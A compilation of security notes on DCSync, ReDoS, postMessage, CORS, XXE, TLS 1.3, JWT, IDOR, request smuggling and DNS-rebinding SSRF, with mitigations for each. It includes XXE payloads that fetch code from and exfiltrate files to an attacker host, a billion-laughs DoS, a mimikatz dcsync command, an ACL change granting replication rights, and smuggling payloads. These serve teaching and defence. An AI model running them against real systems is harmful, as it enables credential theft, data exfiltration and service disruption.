AD replication-based attacks [1]
The specification of the MS-DRSR protocol, which DCs use when replicating in an Active Directory environment, defines the IDL_DRSGetNCChanges method of the DRSUAPI RPC interface, used to replicate changes to NC replicas.
By default, the permissions required to perform a DCSync operation are held by the following entities:
- Domain Controllers:
  - The Ds-Replication-Get-Changes right is granted to NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS.
  - The DS-Replication-Get-Changes-All right is granted to $DOMAIN\Domain Controllers.
- Members of the BUILTIN\Administrators group, which encompasses Domain Admins and Enterprise Admins.
Holders of the aforementioned rights can be enumerated via the Get-ACL cmdlet:
$dcdn = 'DC=CONTOSO,DC=LOCAL';
$guid = '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'; # DS-Replication-Get-Changes-All
(Get-ACL -Path "AD:$dcdn").Access | Where-Object {$_.ObjectType -match $guid}
During the processing of an IDL_DRSGetNCChanges request by a domain controller, access rights are validated by the IsGetNCChangesPermissionGranted procedure, which is composed of the following phases:
- An evaluation of the client's extended right Ds-Replication-Get-Changes (1131f6aa-9c07-11d1-f79f-00c04fc2dcd2) against the domain object.
- The IsRevealSecretRequest method confirms an attempt to request secret attributes, followed by a check of the client's DS-Replication-Get-Changes-All right (1131f6ad-9c07-11d1-f79f-00c04fc2dcd2) against the domain object.
- The IsRevealFilteredAttr method confirms an attempt to request attributes belonging to a filtered set, followed by a check of the client's Ds-Replication-Get-Changes-In-Filtered-Set right (89e95b76-444d-4c62-991a-0facbeda640c), chained with DS-Replication-Get-Changes-All.
The confidentiality of an attribute is determined by an IsSecretAttribute($ATTRIBUTE) procedure, which matches the attribute's type against a predefined list.
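The decision flow can be summarized in a hedged C# sketch; the helper names mirror the MS-DRSR procedures, while ReplicationRequest and HasExtendedRight are hypothetical stand-ins for the server-side plumbing, not the actual implementation:
using System;

// Illustrative sketch of the documented IsGetNCChangesPermissionGranted phases.
// ReplicationRequest and HasExtendedRight are hypothetical stand-ins.
record ReplicationRequest(string Client, string DomainObject,
                          bool RequestsSecrets, bool RequestsFilteredSet);

static class NcChangesAccessCheck
{
    static readonly Guid GetChanges            = new("1131f6aa-9c07-11d1-f79f-00c04fc2dcd2");
    static readonly Guid GetChangesAll         = new("1131f6ad-9c07-11d1-f79f-00c04fc2dcd2");
    static readonly Guid GetChangesFilteredSet = new("89e95b76-444d-4c62-991a-0facbeda640c");

    // Stub: would evaluate the extended-right ACE against the domain object.
    static bool HasExtendedRight(string client, string obj, Guid right) => false;

    public static bool IsGetNCChangesPermissionGranted(ReplicationRequest req)
    {
        // Phase 1: Ds-Replication-Get-Changes against the domain object.
        if (!HasExtendedRight(req.Client, req.DomainObject, GetChanges))
            return false;

        // Phase 2 (IsRevealSecretRequest): secret attributes additionally
        // require DS-Replication-Get-Changes-All.
        if (req.RequestsSecrets &&
            !HasExtendedRight(req.Client, req.DomainObject, GetChangesAll))
            return false;

        // Phase 3 (IsRevealFilteredAttr): filtered-set attributes require
        // Ds-Replication-Get-Changes-In-Filtered-Set chained with
        // DS-Replication-Get-Changes-All (assumption: either right suffices).
        if (req.RequestsFilteredSet &&
            !(HasExtendedRight(req.Client, req.DomainObject, GetChangesFilteredSet) ||
              HasExtendedRight(req.Client, req.DomainObject, GetChangesAll)))
            return false;

        return true;
    }
}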
Detecting and blocking dangerous replication traffic at the network level is easier in a segmented network, where DCs are located within a separate VLAN. Correct segmentation allows signatures to be introduced that target DCE/RPC DRSUAPI calls originating from sources outside the DC VLAN, namely IDL_DRSGetNCChanges requests from client addresses not on the DC list.
Native event 4662 ("An operation was performed on an object") is generated during replication for principals that have a matching entry in the domain object's SACL and that exercise the Ds-Replication-Get-Changes / DS-Replication-Get-Changes-All / Ds-Replication-Get-Changes-In-Filtered-Set rights against the domain object during the operation.
POC
The PoC adds ACEs with the extended rights Ds-Replication-Get-Changes and Ds-Replication-Get-Changes-All to the domain object's DACL. This can be done through the native cmdlets Get-Acl and Set-Acl. An ACE of the ActiveDirectoryAuditRule class is generally identical to an ActiveDirectoryAccessRule, the only differences being the required AuditFlags attribute and the addition via AddAuditRule.
>> $path = 'AD:\DC=contoso,DC=local';
>> $acl = Get-ACL -Path $path -Audit;
>> $ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule(
>> [System.Security.Principal.IdentityReference] ([System.Security.Principal.SecurityIdentifier] 'S-1-5-21-3711008237-1532375651-712317569-500'),
>> [System.DirectoryServices.ActiveDirectoryRights] 'ExtendedRight',
>> [System.Security.AccessControl.AccessControlType] 'Allow',
>> [System.GUID] '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'); # Ds-Replication-Get-Changes; use 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 for DS-Replication-Get-Changes-All
>> $acl.AddAccessRule($ace);
>>
>> Set-ACL -Path $path -AclObject $acl
For example, the events produced by running mimikatz's lsadump::dcsync module on behalf of a test user can be viewed with the Get-WinEvent cmdlet and suitable filters.
.\mimikatz.exe "lsadump::dcsync /domain:contoso.local /user:Administrator" exit
Get-WinEvent -FilterHashtable @{ID = 4662; LogName = '*'; StartTime = ((Get-Date) - (New-TimeSpan -Days 1))} | Where-Object {$_.Message -match 'Access Mask:.*0x100' -and $_.Message -match 'Properties:.*\n.*{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}' -and ($_.Message -notmatch 'Account Name:.*WIN-IPNA74QL8IE' -and $_.Message -notmatch 'Account Name:.*WIN-9IGSLDJ4THF')} | Format-List
Catastrophic backtracking mitigation/prevention
Execution time limitation, recursion limitation, text engines
The simplest solution is to limit the execution time of the matching operation. For example, .NET exposes the MatchTimeout property on Regex objects, and a process-wide default can be set through the AppDomain:
AppDomain domain = AppDomain.CurrentDomain;
// Set a timeout interval of 2 seconds.
domain.SetData("REGEX_DEFAULT_MATCH_TIMEOUT", TimeSpan.FromSeconds(2));
Object timeout = domain.GetData("REGEX_DEFAULT_MATCH_TIMEOUT");
Console.WriteLine("Default regex match timeout: {0}", timeout == null ? "<null>" : timeout);
Regex rgx = new Regex("[aeiouy]");
Console.WriteLine("Regular expression pattern: {0}", rgx.ToString());
Console.WriteLine("Timeout interval for this regex: {0} seconds", rgx.MatchTimeout.TotalSeconds);
Furthermore, the Ruby Regexp class (Ruby 3.2+) also accepts a timeout parameter when creating a regex object, as demonstrated below:
re = Regexp.new("(b|a+)*s", timeout: 4)
q = 'a' * 25 + 'd' + 'a' * 4 + 's'  # 25 a's, 'd', 4 a's, 's'
re =~ q #=> Regexp::TimeoutError
An additional strategy to lower server load is to introduce a recursion limit. PCRE engines provide the capability to restrict recursion during matching through the (*LIMIT_RECURSION=<LIMIT_SET>) modifier, with LIMIT_SET signifying the maximum number of recursive iterations.
Moreover, text-directed (DFA-based) engines fundamentally avoid backtracking owing to their linear scanning principle and reduced complexity. Such engines offer a finite set of capture constructs within an expression, always return a single, longest match, and may yield lower performance than classical regex-directed engines. Patterns such as lazy/possessive quantifiers, atomic grouping, and backreferences cannot be processed by text-directed engines. This principle is infrequently employed on its own and is more commonly integrated into hybrid engines with a dynamic shift of matching paradigm.
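A concrete example of such a hybrid is .NET 7+, where RegexOptions.NonBacktracking switches the built-in engine to a linear-time, automata-based mode; backreferences, lookarounds, and atomic groups are rejected in this mode:
using System.Text.RegularExpressions;

// DFA-style matching: immune to catastrophic backtracking by construction.
var safe = new Regex(@"(a*)*b", RegexOptions.NonBacktracking);
// Completes in linear time even on inputs that stall a backtracking engine:
bool matched = safe.IsMatch(new string('a', 10_000));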
Possessive quantifiers, atomic grouping, secure context
The recommended method is to change the expression being matched. If catastrophic backtracking arises from nested quantified patterns, the expression must be reduced to a form of mutually exclusive conditions so that the engine cannot end up in a long recursive iteration. Possessive quantifiers and atomic groups do not backtrack after an unsuccessful match; this is generally used to improve performance.
initial_ex = /(x+)+y/
possessive_ex = /(x+)++y/
atomic_ex = /(?>x+)+y/
Depending on the expression's intended purpose, it may make sense to embed it within a secure context that ensures its requirements are met. For instance, the expression ((([a-z]{0,254}[a-z])((?<!\.s)))\.){0,20}(([a-z]{0,254}[a-z]))(&) can be evaluated safely by prepending \A to the problematic regex, as follows:
initial_ex = /((([a-z]{0,254}[a-z])((?<!\.s)))\.){0,20}(([a-z]{0,254}[a-z]))(&)/
safe_context_ex = /\A#{initial_ex}/
Another example can be found here: ???
ReDoS
Since RegEx is very widely used, including in filters that process user input, matching a dangerous regular expression against an externally controlled sequence can lead to server failure due to prolonged processing of a malicious request.
Any regular expression whose matching against a special string can result in an exponential increase in the number of steps needed to complete the operation is a potential ReDoS sink. Such growth is a consequence of catastrophic backtracking.
One of the operating principles of RegEx engines is backtracking. Typically, it occurs when the string being matched does not match an expression consisting of successive quantified groups; the engine then tries to find a match by covering all possible combinations. Thus, a dangerous RegEx necessarily contains a quantified capture pattern or is otherwise unoptimized.
Selecting a string that provokes catastrophic backtracking involves a RegEx debugger. Manual analysis of a regular expression depends on the principle of the quantified pattern. For example, for a vulnerable part of a regular expression that includes a greedy quantifier, reproducing catastrophic backtracking requires the engine's step-by-step behavior to contain a repeating process: capture of a long sequence by the algorithm and its subsequent multi-stage rollback.
For example:
\A[0-9a-zA-Z][0-9a-zA-Z_.-]*[0-9a-zA-Z\^]\.{2,3}[0-9a-zA-Z][0-9a-zA-Z_.-]*[0-9a-zA-Z\^]\z
Comparing the patterned sequence w..w..w..w..w................... against the above RegEx causes catastrophic backtracking. The problem here lies in (1) the portion [0-9a-zA-Z\^]\z, which compels the algorithm to regress to the initial match, and (2) the group [0-9a-zA-Z_.-], backed by the greedy quantifier *, which freely spans the rest of the line.
The growth in the number of comparison steps per added character in this example is not dramatic, but it is sufficient to crash the server if the permitted input length is high enough: for 800 characters, the engine needs over 130,000 steps to process the expression.
For comparison, the PCRE2 engine, matching the expression (a*)*b\z against the 14-character string aaaaaaaaaaaaaa, takes more than 160,000 steps. Here, the dependence of resource consumption on the number of characters in the compared string differs significantly from that in the first example: the expression nests groups with identical capture targets, which greatly increases the number of possible combinations.
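The growth is easy to observe empirically. A minimal sketch (timings vary widely across engines and versions; the MatchTimeout guard keeps a runaway match from hanging the process):
using System;
using System.Diagnostics;
using System.Text.RegularExpressions;

// Each extra 'a' roughly doubles the number of combinations the backtracking
// engine must reject before failing the match.
var rgx = new Regex(@"^(a*)*b$", RegexOptions.None, TimeSpan.FromSeconds(10));
for (int n = 14; n <= 26; n += 4)
{
    var sw = Stopwatch.StartNew();
    try { rgx.IsMatch(new string('a', n)); }
    catch (RegexMatchTimeoutException) { /* runaway match aborted */ }
    Console.WriteLine($"n={n}: {sw.ElapsedMilliseconds} ms");
}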
postMessage
The postMessage method is designed for communication between Window objects, bypassing SOP. The master resource's JavaScript obtains or sets a window object reference (w = window.open(...) / contentWindow ...), then passes the message via postMessage(); the target page receives it via the event registered with addEventListener('message', ...).
During cross-window message initialization, unless there is a need to broadcast via postMessage, it is recommended to set the targetOrigin parameter (postMessage(message, targetOrigin, transfer)) to the URI of the target window instead of the wildcard character, to avoid data leaks.
The following configuration performs a postMessage broadcast:
let data = { a: "b", c: "d" };
var popup = window.open(/*popup details*/);
popup.postMessage(JSON.stringify(data), '*');
When a malicious message event is processed, the minimal risk is falsification of the legitimate communication flow between the page's expected partners; in the worst case, there is a risk of arbitrary JavaScript execution (thus, XSS) when HTML is constructed from the received data. Event listeners on the receiving side must therefore be provided with mechanisms for checking the origin of the received message.
The implementation of this verification mechanism is key: it must reliably compare the origin attribute against the list of allowed origins, and the more specific the list, the more reliable the check.
Ineffective origin validation using the 'addEventListener' interface:
window.addEventListener('message', function (e) {
    // substring check: 'https://example.com.attacker.net' would also pass
    if (e.origin.indexOf('example.com') > -1) {
        /* process e.data */
    }
});
Appropriate origin check:
check_hostname = function(e) {
    var t = new Set(["one.example.com", "two.example.com"]);
    try {
        // parse the received origin as a URL and compare the exact hostname
        var i = new URL(e).hostname;
        return t.has(i) ? "APPROVED_URL" : "INVALID_URL"
    }
    catch (e) {
        return "INVALID_URL"
    }
}
Any insertion of raw received data into the page code / jQuery selectors / eval functions, or dynamic construction of location or href/src attributes from the passed data, should be regarded as a potential XSS sink. Therefore, even with a correct origin check, in case the cross-window messaging component is attacked from a trusted domain, the data-processing functions bound to the message eventListeners should, as a second line of defense for the listener, apply sanitization measures, e.g. DOMPurify.
When hosting the component in question for validation, or when reproducing the vulnerability locally, the origin-verification flow for received messages can be traced by manipulating the hostname-resolution settings in Burp Suite's connection parameters.
CORS
The introduction of CORS (a measure aimed at relaxing client-side SOP constraints for web services in need of unrestricted cross-domain interaction) brought, along with its benefits, severe security risks.
The mitigation measure introduced was the pre-flight mechanism. It was developed along with CORS to distinguish servers aware of the new, universally acknowledged browser CORS policy from those unaware of it. This behavior serves as a check of the adequacy of the client-server communication flow. From the client's perspective, it ensures that its requests to the server will be answered properly and as expected, preventing an ineffective stream of requests in case of an invalid server configuration. The server, in turn, ensures that the client's requests align with the configuration in use.
If the amount of traffic between client and server needs to be optimized and reduced, there are several options for avoiding pre-flight messages: from server-side caching (required because browser policies cap the maximum client-side caching period for responses to pre-flight requests) to refactoring requests into CORS-safe ones.
CORS-safe requests do not trigger pre-flight and are identical in format to requests initiated, for instance, through an HTML form. They are restricted to the HTTP methods GET, HEAD, and POST, and to a limited set of permissible non-standard browser headers, one of which, Content-Type, may bear the values text/plain, multipart/form-data, and application/x-www-form-urlencoded.
One could talk at length about the role of pre-flight requests in the security of cross-origin interactions, especially considering that the need for them, in general, appeared with the introduction of CORS, which is essentially a plug for the security hole opened by the new cross-origin request policies. In the current context, however, pre-flight requests really do cut off a large layer of the CSRF attack surface, which has expanded greatly since the introduction of CORS.
An excessively permissive CORS policy, notably one that includes (1) unvalidated or incorrectly (e.g., via flawed RegEx) validated reflection/embedding of the Origin header (or null) into ACAO, or (2) misconfiguration of allowed methods/headers with regard to sensitive endpoints, can lead to serious consequences for the safety of service users.
Insufficient origin configuration:
public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException {
    HttpServletResponse res = (HttpServletResponse) response;
    // A client-controlled value is reflected into ACAO without any validation.
    String providedOrigin = request.getParameter("origin");
    res.setHeader("Access-Control-Allow-Origin", providedOrigin);
    chain.doFilter(request, response);
}
Validation of the received Origin against an Allow-List:
public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException {
    HttpServletResponse res = (HttpServletResponse) response;
    String providedOrigin = request.getParameter("origin");
    // Only allow-listed origins are ever reflected; anything else falls back
    // to the primary origin.
    String allowedOrigin = valid(providedOrigin);
    res.setHeader("Access-Control-Allow-Origin", allowedOrigin);
    chain.doFilter(request, response);
}

private String valid(String providedOrigin) {
    if (providedOrigin != null && (providedOrigin.equalsIgnoreCase("https://example.com") || providedOrigin.equalsIgnoreCase("https://example2.com"))) {
        return providedOrigin;
    }
    return "https://example.com";
}
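For comparison, in ASP.NET Core the same allow-list approach can be expressed through the built-in CORS middleware (a sketch assuming the minimal hosting model used in the JWT example below; the origins are illustrative):
// Program.cs: explicit origin allow-list via the built-in CORS middleware.
builder.Services.AddCors(options =>
{
    options.AddPolicy("AllowListed", policy =>
        policy.WithOrigins("https://example.com", "https://example2.com")
              .WithMethods("GET", "POST")     // no blanket AllowAnyMethod()
              .WithHeaders("Content-Type"));  // no blanket AllowAnyHeader()
});
// ...
app.UseCors("AllowListed");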
XXEi
Exploitation vectors:
- RCE through the 'expect://' wrapper on a PHP server with the Expect extension. Given the constraints caused by the prohibition of spaces and the parser's refusal to decode encoded symbols, the system variable $IFS can be used as the delimiter when constructing the URI.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY file SYSTEM "expect://curl$IFS-O$IFS'attacker-server.com:8000/xxe.php'">
]>
<root>
<name>Joe</name>
<email>START_&file;_END</email>
</root>
- File extraction via SSRF through OOB XXEi in a blind context.
<?xml version="1.0" ?>
<!DOCTYPE aaa [
<!ENTITY % bbb SYSTEM "http://attacker-server.com:8090/xxe.dtd">
%bbb;
%ccc;
]>
<a>&eee;</a>
<!-- xxe.dtd -->
<!ENTITY % ddd SYSTEM "file:///var/www/web.xml">
<!ENTITY % ccc "<!ENTITY eee SYSTEM 'ftp://ATTACKERSERVER:2121/%ddd;'>">
- Classic billion laughs DoS.
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
]>
<lolz>&lol6;</lolz>
Mitigation measures include:
- disabling XInclude;
- disabling XXE;
- disabling DTDs, or resorting to XSD as a viable alternative;
- if an application interfaces with JSON, taking care to ensure that endpoints do not process XML;
- additionally, it may make sense to restrict the schemas employed and the data transmitted in the response issued to the client.
For mitigation guidance, refer to the following resource: https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html.
For example, in .NET 8, XmlReader objects are by default initialized with XmlReaderSettings.DtdProcessing = DtdProcessing.Prohibit and XmlReaderSettings.XmlResolver = null.
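On older runtimes, or wherever the defaults cannot be relied upon, the same restrictions can be set explicitly; a minimal sketch (input.xml is illustrative):
using System.Xml;

// Explicitly prohibit DTDs and external resolution instead of relying on defaults.
var settings = new XmlReaderSettings
{
    DtdProcessing = DtdProcessing.Prohibit, // reject any DOCTYPE outright
    XmlResolver = null                      // never fetch external entities/DTDs
};
using var reader = XmlReader.Create("input.xml", settings);
while (reader.Read()) { /* process nodes */ }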
TLS 1.3
In the context of the TLS protocol, a connection is a state of mutual communication in which both parties possess a certain undisclosed sequence, shielded from third parties, for subsequent use in mutual data encryption/decryption. For example, a server-client handshake in TLS 1.3 using the TLS_AES_256_GCM_SHA384 cipher suite proceeds as follows:
- The client generates ephemeral key pairs.
- Client Hello: The client sends a sequence containing the client random, administrative information (including a list of supported cipher suites, a list of supported protocol versions, session ID, and so forth), and client public keys.
- The server generates an ephemeral key pair according to the client's preferences.
- Server Hello: The server sends a sequence comprising the server random, administrative information (selected cipher, chosen protocol version, and so forth), and an ephemeral public key.
- The server generates an encryption key for subsequent client-server communication establishment, deriving it from the client's public key, the server's private key, and hashed values of ClientHello and ServerHello.
- The client generates the aforementioned key. Thus, all further communication from the client to the server is encrypted.
- Server Certificate: The server sends certificate(s).
- Server Certificate Verify: The server sends a signature and a subsequent "Server Handshake Finished" message. Because TLS 1.3 mandates ephemeral key pairs during connection establishment, the server proves certificate ownership by signing the hash of the entire preceding server-client transcript with the certificate's private key, for subsequent validation by the client using the public key from the certificate.
- The server generates a shared secret, utilizing the values of the current encryption key and the hashes of each handshake message, commencing with ClientHello and concluding with Server Handshake Finished.
- The client generates a shared secret using a similar algorithm.
- Client Handshake Finished: The client sends an affirming message with a challenge.
- Client Application Data: The client sends data.
- Server New Session Ticket: The server sends two messages with one-time session tickets.
- Server Application Data: The server sends data.
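For illustration, a client can insist on this handshake by pinning the protocol version; a minimal sketch using .NET's SslStream (the host name is illustrative):
using System;
using System.Net.Security;
using System.Net.Sockets;
using System.Security.Authentication;
using System.Threading;

// Require TLS 1.3: the handshake described above, with older protocol
// versions rejected during negotiation.
using var tcp = new TcpClient("example.com", 443);
using var tls = new SslStream(tcp.GetStream());
await tls.AuthenticateAsClientAsync(new SslClientAuthenticationOptions
{
    TargetHost = "example.com",
    EnabledSslProtocols = SslProtocols.Tls13
}, CancellationToken.None);
Console.WriteLine($"Negotiated {tls.SslProtocol}, cipher suite {tls.NegotiatedCipherSuite}");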
JWT Header Injections & Algorithm Confusion attacks
A JWT is usually issued as follows: the client transmits its credentials to the server, and after validating them the server generates a JWT from the following values:
1. HEADER, which contains information pertaining to the server-side JWT configuration (such as the algorithm employed for signature generation/validation and the identifier of the key to use, kid).
2. PAYLOAD, generated by the server according to a template from preset informational values as well as static and session information about the client (e.g., user ID, token refresh data, the resource the token represents, token usage context).
3. SIGNATURE, serving as the "seal" of the token: an encapsulation of a hash of the concatenation of HEADER and PAYLOAD, encrypted with a key or key pair as defined by the chosen encryption scheme.
Usually a JWT refresh token is generated as well. When the client later presents the issued token, the server validates it by repeating the signature generation and comparing the result with the presented signature.
Attacks of the "algorithm confusion" type are reliant on the assumption that, during JWT validation, instead of mandatorily sticking to predefined algorithms, the server will fall back to an algorithm specified within the received token.
For instance, systems implementing asymmetric algorithms such as RS256 can, in theory, contain a misconfiguration where, after reading the alg value in the token's HEADER, the server proceeds to validate the token using the public key as a shared HMAC secret rather than performing asymmetric verification with it.
A similar vulnerability may arise if a "none" algorithm is specified.
Furthermore, the injection of jwk and jku headers, within the scope of user authentication by a vulnerable server, results in the server employing the keys, or their sources, contained in the supplied token's HEADER for its validation.
A mitigation strategy for such attacks consists of establishing and using a static signature-validation algorithm or a list of expected algorithms. If a list is chosen, avoid mixing asymmetric algorithms with HS*.
//// Program.cs
// ...
builder.Services.AddAuthentication(x =>
{
x.DefaultAuthenticateScheme = JwtBearerDefaults.AuthenticationScheme;
x.DefaultChallengeScheme = JwtBearerDefaults.AuthenticationScheme;
x.DefaultScheme = JwtBearerDefaults.AuthenticationScheme;
}).AddJwtBearer(x =>
{
x.TokenValidationParameters = new Microsoft.IdentityModel.Tokens.TokenValidationParameters
{
// grabbing Issuer and Audience from appsettings.json
ValidIssuer = config["JwtSettings:Issuer"],
ValidAudience = config["JwtSettings:Audience"],
// safely grabbing JWT_SECRET_KEY from the environment; this can be provided to a container
// via, for example, a CD-pipeline-side K8s Pod object referencing a SealedSecret
IssuerSigningKey = new Microsoft.IdentityModel.Tokens.SymmetricSecurityKey(
System.Text.Encoding.UTF8.GetBytes(Environment.GetEnvironmentVariable("JWT_SECRET_KEY"))
),
// requiring algorithm usage, this prevents algorithm confusion attacks, if set properly
ValidAlgorithms = new[] {"HS256"},
// setting validation policies
ValidateIssuer = true,
ValidateAudience = true,
ValidateLifetime = true,
// this prevents arbitrary signature validation
ValidateIssuerSigningKey = true
};
});
// ...
Parameter-based BAC & IDOR
In the context of IDOR testing, the security of the target relies entirely on the quality of the CRUD implementation. In my experience, standard CRUD functionality can be categorized as follows:
- Users: Personal settings, owned resources, interactions, memberships.
- Spaces: Space settings, space participants, resources in the ownership of the space (which may be subordinate spaces).
At present, BAC vulnerabilities such as "passing an intended accessor ID to the controller" or "altering the value of the isAdmin parameter for access to the administrator panel," while they do occur, are less common. Nonetheless, as is often the case with scalability, problems arise.
In general, within the context of spaces, the rights of service clients can be classified into 7 user levels:
- Administrator
- Moderator
- Owner Participant (creator of subordinate ownership within a space)
- Participant
- Participant with reduced privileges
- User (a user with no access to the space)
- Unauthorized User
The functionality of each subcategory is determined by a pool of API endpoints responsible for specific actions on the target resource and depends on the category's settings. All of this is useful for delineating CRUD functionality according to access levels, as it is crucial to test each endpoint separately using the authorization of every user level that is restricted from that endpoint.
The Create, Update, and Delete functionality for user categories is almost always protected against IDOR by server-side verification of the requesting user's access to the endpoint in question; bypassing these restrictions falls outside the scope of IDOR testing. Usually, when passing unknown parameters as part of a request, one has to check whether they are mandatory, where they come from, and how they are computed. When passing parameters responsible for access-level checks, one has to verify how they are validated server-side.
Consider a hypothetical scenario:
Imagine a forum with a certain community, where a community moderator posts a private message accessible only to moderators.
In this case, considering the classification above, the community can be classified as a "space," and the post as a subordinate space, since it contains distinct settings.
Upon publication, the post is assigned an Id value of 123, following the previous, publicly accessible post with Id 122. This allows users of the participant level to easily determine the Ids of private posts. When the resource is accessed directly (vulnapp.com/group_3/p123), the server correctly verifies the authentication measures. However, when the REST API endpoint changeViewPermissions, responsible for altering the list of user levels with access to the post, is accessed, the server incorrectly verifies the values of the Authorization and Cookie headers, relying instead on the parameters username and secret_value.
What secret_value is remains unknown to the attacker, but by making a similar request in their own community and tracking the source of the value, they notice that it is returned by a certain API call when their own userid value is passed in the request. The attacker, having entered the list of moderators in the target community and obtained the desired userid, makes the same API request for the "secret_value", this time passing the moderator's userid; having received the requested value in the response, they proceed to make a request changing the visibility settings of the target private post, with a positive outcome.
POST /group_3/p123/changeViewPermissions
Host: vulnapp.com
Authorization: Bearer ***
Cookie: ***
{"userid": "6343", "secret_value": "***"}
HTTP Request Smuggling
HTTP Request Smuggling is an attack on the HTTP protocol based on a collision of conflicting configurations of the mechanisms that determine the total length of an incoming user request on the front-end and back-end servers during request processing.
When popular server software is used, such issues typically do not arise thanks to security measures that are often enabled by default. Nevertheless, as software becomes obsolete, as developers introduce custom configurations for header processing or request-length determination, or as lesser-known server solutions unfamiliar to developers are deployed, significant vulnerabilities may be introduced.
Possible security measures include:
- Given its inherent nature (each message carries an unambiguous frame length), end-to-end HTTP/2 is immune to request smuggling attacks. A logical solution is therefore to implement HTTP/2 request processing exclusively, on both servers.
- If using HTTP/2 on both sides is not feasible, a significant portion of the HTTP/2 downgrading attack vectors can be mitigated by employing HTTP/1.1 end to end instead.
- Employing a uniform method for determining request length on both servers, and rejecting as potentially hazardous any request that carries the inactive (unused) mechanism.
- Vulnerabilities of the CL.0 and H/2.0 types arise when the back end disregards the value of the CL header and assumes that all received requests have empty bodies. Avoid such behavior.
- To prevent H/2 downgrading attacks even with properly filtered CL/TE headers / TE.TE / CL.0, server responses must be tested for header obfuscation, CRLFi, and header discrepancies. Additionally, disable unused HTTP methods.
The complexities of exploitation primarily center on identifying the front-end's request reformatting and normalization patterns required for correct back-end processing. When both servers employ HTTP/1, the vulnerability relies on differences in the interpretation, filtering, and processing of the "Content-Length" and "Transfer-Encoding" headers. Where a downgrade of the HTTP protocol version is required for back-end request processing, the vulnerability relies on errors in, the absence of, or weaknesses in the filtering of the CL/TE headers received within the context of an HTTP/2 request.
- The Content-Length (CL) header counts the number of bytes in an HTTP request body, starting immediately after the CRLF delimiter sequence that terminates the headers. In brief, CL determines the length of the HTTP request body, its value being the number of bytes in that body. The server needs this to determine the point at which it should stop reading the request and begin processing it.
- Transfer-Encoding: chunked serves the same purpose but allows the server to process parts of the received body dynamically, without waiting for the complete request. According to the HTTP/1.1 specification, this is useful when transmitting a large amount of data to the server. When this header is specified with the "chunked" value, the data in the request body is transmitted in chunks. Each chunk, starting from the first, must begin with the number of octets in the chunk, in hexadecimal, followed by a CRLF and then the data itself (e.g., b\r\naaadsfddsds\r\n). The message ends with a final zero-length chunk, followed by a CRLF.
Let's consider examples. Suppose the server does not reuse TCP connections for different clients; the attacker must then receive the response to the smuggled request within the response to the main request. Here the HEAD method allows turning the vulnerability non-blind, since the response to it contains a CL header matching the body of the corresponding GET response. To avoid timeout errors and truncation of the received response body, an endpoint with reflection can be used, as shown below. Here is an example of request tunneling through H/2 downgrading via CRLFi, resulting in cache poisoning.
:method = HEAD
:scheme = https
:path = /smth.js HTTP/1.1\r\n
Host: vulnerable-website.com\r\n
\r\n
GET /reflection-here?<script>alert()<script>sssssssssssssssssssssssssssssssssssssss HTTP/1.1\r\n
Foo: x
:authority = vulnerable-website.com
Under the described scenario, the back end receives the request in the following form:
HEAD /smth.js HTTP/1.1
Host: vulnerable-website.com
GET /reflection-here?<script>alert()<script>sssssssssssssssssssssssssssssssssssssss HTTP/1.1\r\n
Foo: xHTTP/1.1
Host: vulnerable-website.com
Content-Type: text/html
Regarding criticality in the simplest CL.TE request smuggling: an attack resulting in response-queue poisoning occurs when TCP connections between the front-end and back-end servers are reused for multiple requests. The technique involves the attacker sending a wrapper request containing a smuggled request that is processed correctly and remains unchanged when merged with the subsequently received client request. The back-end server processes the root request, leaving the smuggled request "hanging" until the next legitimate client request arrives. Because the smuggled request's predefined structure remains valid when additional characters are appended to it, the server processes the previous smuggled request and forwards its response to the client upon receiving the next one. Consequently, until the connection is refreshed, the back-end response queue permanently lags by one unprocessed request, creating a desynchronization cycle that affects all users of the server and results in at least a service disruption and the exposure of numerous session keys.
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 61
Transfer-Encoding: chunked
0
GET /anything HTTP/1.1
Host: vulnerable-website.com\r\n\r\n
SSRF via TOCTOU DNS Rebinding
In the context of Server-Side Request Forgery (SSRF), DNS Rebinding is a TOC/TOU attack, wholly reliant on an attacker-controlled domain and its DNS configuration, in which the attacker manipulates the IP-address resolution performed by the vulnerable web application's server.
An example of a public DNS Rebinding service is 1u.ms, which offers a range of convenient configuration options along with a publicly accessible event log; this can be useful if you don't have a machine with a public IP address.
Let's imagine a hypothetical scenario for circumventing local IP address filtering using this technique:
- Suppose that the target web application's back-end server expects a URI within an HTTP request directed to a specific API endpoint. The server's objective is to retrieve the web page's content based on the provided URI and store its render in a database for subsequent client viewing.
- A protective function against SSRF has been implemented on the back-end server: it filters IP addresses obtained from URIs, rejecting potentially dangerous ones (e.g., the loopback address 127.0.0.1 or the "cloud localhost").
- The attacker, as part of a request to the target API endpoint, includes their server's domain name in the HTTP request. This domain is registered, hosted, and configured on a public DNS server as follows:
  - The domain has two records. Assume one record points to an IP address in the public space, such as 1.2.3.4, and the other points to 127.0.0.1.
  - The configuration sets an extremely low Time-To-Live (TTL) value on the resolution response for the first IP, preventing extended caching of the response on the receiving end.
